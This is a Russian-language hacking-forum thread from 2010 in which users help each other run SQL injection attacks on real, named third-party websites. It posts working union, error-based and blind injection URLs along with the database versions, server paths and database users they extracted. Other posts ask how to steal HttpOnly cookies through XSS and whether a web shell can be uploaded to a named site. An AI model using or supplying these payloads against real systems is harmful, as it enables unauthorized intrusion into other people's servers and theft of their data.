Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

01.04.2010, 21:36
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
Помогите определить версию БД
http://www.opderschmelz.lu/index.php?id=10;event=(select+1+from+(select+count (0),concat((select+version()),floor(rand(0)*2))+fr om+(select+1+union+select+2+union+select+3)x+group +by+2+limit+1)a)
http://www.opderschmelz.lu/admin/
набираю 'or+5=5/*
не проходит
|
|
|

01.04.2010, 22:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме: 3363660
Репутация:
1148
|
|
Сообщение от FlaktW
Помогите определить версию БД
Код:
_http://www.opderschmelz.lu/index.php?id=10;event=415+and+5=@@version
5 ветка!
|
|
|

02.04.2010, 00:53
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Код:
http://www.opderschmelz.lu/index.php?id=10;event=415+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,version(),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+limit+1,1/*
5.0.32-Debian_7etch10-log
|
|
|

02.04.2010, 08:15
|
|
Banned
Регистрация: 04.06.2009
Сообщений: 58
Провел на форуме: 327313
Репутация:
23
|
|
Парни , кто часто с blind Работает помогите раскурить , сам пока мало что понимаю:
http://www.lavozindependiente.com/news.php?nid=517'
Что то сам пытался..
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4=fa lse
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5=tr ue
|
|
|

02.04.2010, 08:33
|
|
Новичок
Регистрация: 03.07.2009
Сообщений: 11
Провел на форуме: 51296
Репутация:
0
|
|
Вопрос по XSS
Подскажите как можно получить все куки, если часть куков имеют флаг HttpOnly, и javascript не может получить доступ к ним.
Пробовал использовать обьект XMLHttpRequest, но и он не может извлечь куки.
|
|
|

02.04.2010, 15:36
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Сообщение от G1G
Парни , кто часто с blind Работает помогите раскурить , сам пока мало что понимаю:
http://www.lavozindependiente.com/news.php?nid=517'
Что то сам пытался..
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4=fa lse
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5=tr ue
Код:
http://www.lavozindependiente.com/microsite.php?cha=66+and+substring(version(),1,1)=5
@@tmpdir: /tmp
@@basedir: /usr/
version(): 5.1.44
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu
user(): hdn_bo_user@orinoco.venred.com
database(): lavozi_lavozindependiente_com_-_db
дальше сложнее, т.к. и union и select фильтруются неподецки
|
|
|

02.04.2010, 16:01
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 18
Провел на форуме: 92411
Репутация:
3
|
|
Здравствуйте есть скуля http://stats.freearena.ru/cs_SuperHero/sh_hero.php?hero=1'+union+select+id,2,3,4,5,6,7+FR OM+'Users'+limit+1,1/*
через INFORMATION_SCHEMA.TABLES нашел табл. users пытаюсь вывести не хочет выводить может прав нету или она в другой бд висит?
|
|
|

02.04.2010, 16:04
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Код:
http://stats.freearena.ru/cs_SuperHero/sh_hero.php?hero=1'+union+select+count(id),2,3,4,5,6,7+from+users/*
1 - запись только. Users в кавычки брать не надо
|
|
|

02.04.2010, 16:10
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 18
Провел на форуме: 92411
Репутация:
3
|
|
спасибо) но так не интересно была бы бд общая)
|
|
|

02.04.2010, 16:16
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 18
Провел на форуме: 92411
Репутация:
3
|
|
http://cstrike.freearena.ru/stats/cs/Classic/index.php тут шелл залить никак нельзя?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|